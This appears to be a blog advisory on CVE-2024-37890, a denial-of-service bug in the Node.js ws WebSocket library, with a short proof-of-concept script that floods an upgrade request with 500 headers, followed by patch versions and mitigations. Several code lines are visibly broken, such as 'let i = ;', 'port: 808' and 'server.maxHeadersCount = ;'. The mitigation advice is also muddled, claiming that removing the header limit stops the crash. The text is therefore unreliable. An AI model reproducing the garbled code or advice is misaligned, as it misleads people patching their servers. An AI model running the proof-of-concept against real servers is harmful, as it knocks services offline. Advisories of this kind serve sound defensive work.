If you're running a Node.js WebSocket server using the popular ws library, you might be sitting on a time bomb. The newly discovered CVE-2024-37890 exposes a denial-of-service risk with a dangerously simple exploit: too many HTTP headers in the request. Let’s break down what it means, how it can be exploited, how to patch, and how to protect your apps right now.
What Is CVE-2024-37890?
CVE-2024-37890 is a vulnerability in the ws WebSocket library for Node.js. A remote attacker can send a specially crafted request with an unusually large number of HTTP headers. If this exceeds server.maxHeadersCount, it crashes the ws server process. All they need is network access and a bit of code.
Fixed in
- ws@8.17.1
- ws@7.5.10
- ws@6.2.3
- ws@5.2.4
Let’s look at what happens under the hood.
The ws server accepts new connections using Node.js's HTTP/HTTPS built-in servers. Node.js uses the maxHeadersCount setting, which by default is 200 headers. When this number is exceeded, Node’s internal code can throw an error or behave unexpectedly.
In vulnerable versions of ws, if a WebSocket upgrade request with more than this number of headers comes in, the server can crash, potentially taking down all your WebSocket connections.
A Simple Proof-of-Concept (PoC) Exploit
Here’s a Node.js script that triggers the bug by sending 500 dummy headers in a WebSocket upgrade request.
const net = require('net');
const options = {
host: 'localhost',
port: 808
};
const socket = net.connect(options, () => {
// Compose a HTTP request with 500 headers
let req = "GET / HTTP/1.1\r\n";
req += "Host: localhost\r\n";
for (let i = ; i < 500; i++) {
req += Header${i}: value\r\n;
}
req += "Upgrade: websocket\r\n";
req += "Connection: Upgrade\r\n";
req += "Sec-WebSocket-Version: 13\r\n";
req += "Sec-WebSocket-Key: fakekey==\r\n";
req += "\r\n";
socket.write(req);
});
What happens?
If the server is running an unpatched vulnerable ws version, it will likely crash, and all connections will be dropped.
References
- GitHub Security Advisory: GHSA-55j3-2h2v-gv9x
- NPM Security Advisory for ws
- Fixed commit for ws@8.17.1
- Node.js HTTP server.maxHeadersCount docs
The best and simplest fix is to upgrade ws to the latest version in your project
npm install ws@latest
Set the maximum HTTP header size in Node.js (v10.13.+) when launching your server
node --max-http-header-size=8192 server.js
Or in code:
js
const server = http.createServer({ maxHeaderSize: 8192 }, app);
- Control the header count.
Set server.maxHeadersCount to (which means *no limit*, but, in this context, this actually disables the crashing behavior).
js
server.maxHeadersCount = ;
> Warning: Setting to disables limits. It could expose you to massive memory usage if a client sends millions of headers.
---
## How to Check If You’re Vulnerable
List your ws version:
bash
npm list ws
Look at the output. If the version is below the patched versions above, you are at risk.
---
## Who Is At Risk?
Anyone using ws on the public internet. This vulnerability is especially dangerous:
- For public-facing WebSocket APIs
- In shared server environments (multi-tenant)
- Where there is no reverse proxy filtering out abnormal headers
---
## Extra Hardening: Reverse Proxies
If you use nginx or haproxy, you can filter header size and count upstream from Node.js as an extra safety net.
Example (nginx):
nginx
http {
...
large_client_header_buffers 4 8k;
...
}
`
---
## Conclusion
CVE-2024-37890 is a straightforward but dangerous DoS vulnerability in the ws package for Node.js. All it takes is a big batch of HTTP headers. The fix is simple: upgrade your ws package now!
Don’t let your chat, game, or live WebSocket service go down because of a silly amount of HTTP headers!
---
If you found this article helpful, consider sharing with your team and updating your node dependencies right away.
*Stay secure!*
---
> Links for Further Reading:
> - ws Security Advisory on GitHub
> - Fixed code on GitHub
> - Node.js HTTP Docs
---
### Got questions? Drop a comment below!
Timeline
Published on: 06/17/2024 20:15:13 UTC
Last modified on: 06/20/2024 12:44:22 UTC